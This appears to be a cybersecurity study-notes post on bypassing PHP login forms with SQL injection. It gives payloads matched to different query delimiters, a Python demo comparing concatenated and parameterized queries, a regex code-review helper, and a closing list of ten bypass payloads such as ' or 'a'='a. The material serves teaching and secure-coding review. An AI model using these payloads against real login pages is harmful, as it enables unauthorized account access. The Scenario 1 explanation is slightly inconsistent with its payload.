Premise

In this post, we reviewed a login form written in PHP and vulnerable to SQL Injection. We compared different versions of the code and built a SQL Injection payload for each case.

Skills Learned

  • PHP
  • SQL Injection
  • Code Review

The Root of the Problem: Unsanitized Input

The fundamental issue I look for is how the web application handles the username and password I enter. In the vulnerable examples, the code takes my input and plugs it directly into an SQL query without cleaning or “sanitizing” it first. This is a huge security flaw because it allows me to inject my own SQL commands and manipulate the query to my advantage.

Exploiting Different Login Forms

The way I craft my attack depends entirely on how the backend SQL query is written. Let’s look at a few common scenarios.

Scenario 1: No Quotes

In this case, the SQL query uses the variables for the username and password without any surrounding quotes. This makes the injection pretty straightforward.

  • My Goal: Make the WHERE clause of the query always true.
  • How I do it: I can use a simple payload like root' or 1=1 --. The first part, root', provides a username and closes an imaginary string. The or 1=1 is a condition that is always true, and the -- at the end is a SQL comment, which tells the database to ignore the rest of the original query (such as the part that checks the password).

Scenario 2: Single Quotes

This is a very common setup where the username and password in the query are wrapped in single quotes (e.g., 'username'). My payload needs to account for that initial quote.

  • My Goal: Break out of the single quotes and then make the condition true.
  • How I do it: A payload like ' or 'a'='a works perfectly. The first single quote in my payload closes the opening quote from the original query. Then, I add an OR condition that is always true ('a'='a').

Scenario 3: Parentheses and Quotes

Sometimes, developers wrap their query parameters in both parentheses and quotes, like ('username'). My payload needs to close both.

  • My Goal: Close both the quote and the parenthesis before injecting my logic.
  • How I do it: A payload like ') or true -- does the trick. The ') closes the (' from the query, and or true -- bypasses the rest of the authentication check.

Scenario 4: Double Quotes

This is less common than single quotes, but the principle is identical. If the query uses double quotes (e.g., "username"), I just swap my single quotes for double quotes.

  • My Goal: Break out of the double quotes.
  • How I do it: A payload like " or 1 -- will close the initial double quote and make the condition true.
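The query shapes from scenarios 2 and 3 above, rebuilt as an added example in Python with SQLite (this is not the PHP code from the post): the post's payloads are submitted in both form fields against a query that splices the input straight into the SQL string, the same inputs are then sent through a parameterized query, and a payload aimed at the wrong delimiter shape is shown to be rejected by the database. Scenario 4 is left out because SQLite reads double-quoted text as an identifier by default, so it would not reproduce MySQL's behaviour. The table, the credentials and the `VULNERABLE_SHAPES` templates are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the application's user table (example data only).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('root', 'hunter2')")
    return db

# Query shapes from the post. The vulnerable PHP pastes $user / $pass straight
# into the SQL string; str.format plays that role here. (Scenario 4, double
# quotes, is omitted because SQLite treats "..." as an identifier by default.)
VULNERABLE_SHAPES = {
    "single_quotes": "SELECT username FROM users WHERE username='{u}' AND password='{p}'",
    "paren_quotes":  "SELECT username FROM users WHERE username=('{u}') AND password=('{p}')",
    "double_parens": "SELECT username FROM users WHERE (username=('{u}') AND password=('{p}'))",
}

# The payloads the post lists, keyed by the query shape they were built for.
PAYLOADS = {
    "single_quotes": ["' or 1=1 --", "' or 'a'='a"],
    "paren_quotes":  ["') or 1 --"],
    "double_parens": ["')) or 1 --"],
}

def build_vulnerable_sql(shape, user, password):
    """Return the statement the vulnerable code would send (what step 2 of a review reveals)."""
    return VULNERABLE_SHAPES[shape].format(u=user, p=password)

def vulnerable_login(db, shape, user, password):
    """Execute the concatenated query; a payload that leaves delimiters unbalanced raises."""
    return db.execute(build_vulnerable_sql(shape, user, password)).fetchall()

def safe_login(db, user, password):
    """Parameter binding: values travel separately from the statement text, so
    quotes, parentheses or '--' in the input can never change its structure."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(sql, (user, password)).fetchall()

def bypass_matrix(db):
    """For every shape/payload pair: does submitting the payload in BOTH fields
    return a user row without knowing the password?"""
    results = {}
    for shape, payloads in PAYLOADS.items():
        for payload in payloads:
            rows = vulnerable_login(db, shape, payload, payload)
            results[(shape, payload)] = len(rows) > 0
    return results

def wrong_shape_fails(db):
    """The single-quote payload against the parenthesised query leaves an
    unclosed '(' after the comment cuts the rest off, and the database rejects
    it: the payload must match the query's delimiters, which is why the review
    starts from the source code."""
    try:
        vulnerable_login(db, "paren_quotes", "' or 1=1 --", "' or 1=1 --")
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    for (shape, payload), ok in bypass_matrix(db).items():
        print(f"{shape:14} {payload!r:16} bypass={ok}")
        print("   ", build_vulnerable_sql(shape, payload, payload))
    print("wrong shape rejected:", wrong_shape_fails(db))
    print("prepared statement, payload:   ", safe_login(db, "' or 1=1 --", "' or 1=1 --"))
    print("prepared statement, real creds:", safe_login(db, "root", "hunter2"))
```

The printed statements make the post's point concrete: the only thing each payload does is close whatever delimiter the developer opened and append an always-true condition. The `safe_login` function is the fix a code review should push for; with bound parameters the same strings are compared as literal usernames and passwords and return no row, whereas "sanitizing" by stripping characters is fragile and depends on guessing every delimiter the query uses.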

How I Review Code for Flaws

When I’m looking at the source code (in this case, PHP), my process is simple:

  1. Find the Input: I first locate where the code receives user input, typically from $_POST or $_GET variables for the login and password.
  2. Trace the Input: I then follow that input to see how it’s used. My main question is: Is it being placed directly into an SQL statement?
  3. Craft the Payload: Once I see how the query is constructed (with or without quotes, parentheses, etc.), I can build the perfect SQL injection payload to bypass the login.

This method of analyzing and exploiting vulnerable login forms is a fundamental skill, and understanding it is key to both web security testing and building secure applications.
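The three review steps above, as an added example in Python that is not from the post: a small pattern-based pass over a constructed PHP excerpt that finds variables assigned from $_POST / $_GET (step 1), flags the SQL-building lines those variables are spliced into (step 2) and reports the two characters in front of each one, which is what decides the scenario (step 3). The PHP sample, the regular expressions and the function names are assumptions made for the example. A regex pass is a triage aid, not a taint analysis: it misses input that reaches the query through further variables or helper functions, so its output is a list of places to read closely, not a verdict.

```python
import re

# Constructed PHP excerpt standing in for a login script under review (not the
# post's code). Lines 4-6 splice request input into SQL; line 7 is prepared.
SAMPLE_PHP = r'''<?php
$user = $_POST['username'];
$pass = $_POST['password'];
$q  = "SELECT * FROM users WHERE username=('$user') AND password=('$pass')";
$q2 = "SELECT id FROM users WHERE username='" . $user . "' AND password='" . $pass . "'";
$q3 = "SELECT id FROM users WHERE username=" . $_GET['u'];
$stmt = $conn->prepare("SELECT * FROM users WHERE username=? AND password=?");
$stmt->bind_param("ss", $user, $pass);
'''

SUPERGLOBALS = {"_POST", "_GET", "_REQUEST"}
# $name = $_POST[...]  (or $_GET / $_REQUEST): the variable now carries user input.
SOURCE_RE = re.compile(r'\$(\w+)\s*=\s*\$_(?:POST|GET|REQUEST)\[')
# Lines that build SQL text.
SQL_RE = re.compile(r'\b(?:SELECT|INSERT|UPDATE|DELETE)\b', re.I)
# A PHP variable reference, including ${name} and an optional [index].
VAR_RE = re.compile(r'\$\{?(\w+)\}?(?:\[[^\]]*\])?')
# String concatenation glue ('" . ' or ' . "'); folding it out leaves the SQL
# delimiters directly adjacent to the variable.
CONCAT_RE = re.compile(r'''["']\s*\.\s*|\s*\.\s*["']''')

def tainted_variables(php_source):
    """Step 1: variables assigned straight from request superglobals."""
    return set(SOURCE_RE.findall(php_source))

def classify(context):
    """Map the two characters preceding the variable to the post's scenarios."""
    if context.endswith("('"):
        return "parentheses and quotes (scenario 3)"
    if context.endswith("'"):
        return "single quotes (scenario 2)"
    if context.endswith('"'):
        return "double quotes (scenario 4)"
    return "no quotes (scenario 1)"

def find_injection_sinks(php_source):
    """Step 2: SQL-building lines where a tainted variable or a superglobal is
    spliced into the statement text. A prepared statement keeps only '?' inside
    the string, so it produces no finding."""
    tainted = tainted_variables(php_source)
    findings = []
    for lineno, raw in enumerate(php_source.splitlines(), 1):
        if not SQL_RE.search(raw):
            continue
        line = CONCAT_RE.sub("", raw)
        for m in VAR_RE.finditer(line):
            name = m.group(1)
            if name not in tainted and name not in SUPERGLOBALS:
                continue
            context = line[max(0, m.start() - 2):m.start()]
            findings.append({"line": lineno, "var": name,
                             "context": context, "shape": classify(context)})
    return findings

if __name__ == "__main__":
    print("tainted:", sorted(tainted_variables(SAMPLE_PHP)))
    for f in find_injection_sinks(SAMPLE_PHP):
        print(f"line {f['line']}: ${f['var']} spliced into SQL after "
              f"{f['context']!r} -> {f['shape']}")
```

Run against the sample, the pass reports five sinks across lines 4 to 6 and nothing for line 7, and the reported shape tells the reviewer which delimiter structure the query has. The remediation for every finding is the same: move the value out of the string into a bound parameter, as the `prepare` / `bind_param` pair on lines 7 and 8 already does.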

Technical Commands (SQL Injection Payloads)

Here are the payloads I used to bypass the different login forms:

  • root' or 1=1 --
  • ' or 1=1 --
  • ' or 1 --
  • ' or 'a'='a
  • ') or true --
  • ') or 1 --
  • " or true --
  • " or 1 --
  • ')) or true --
  • ')) or 1 --

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.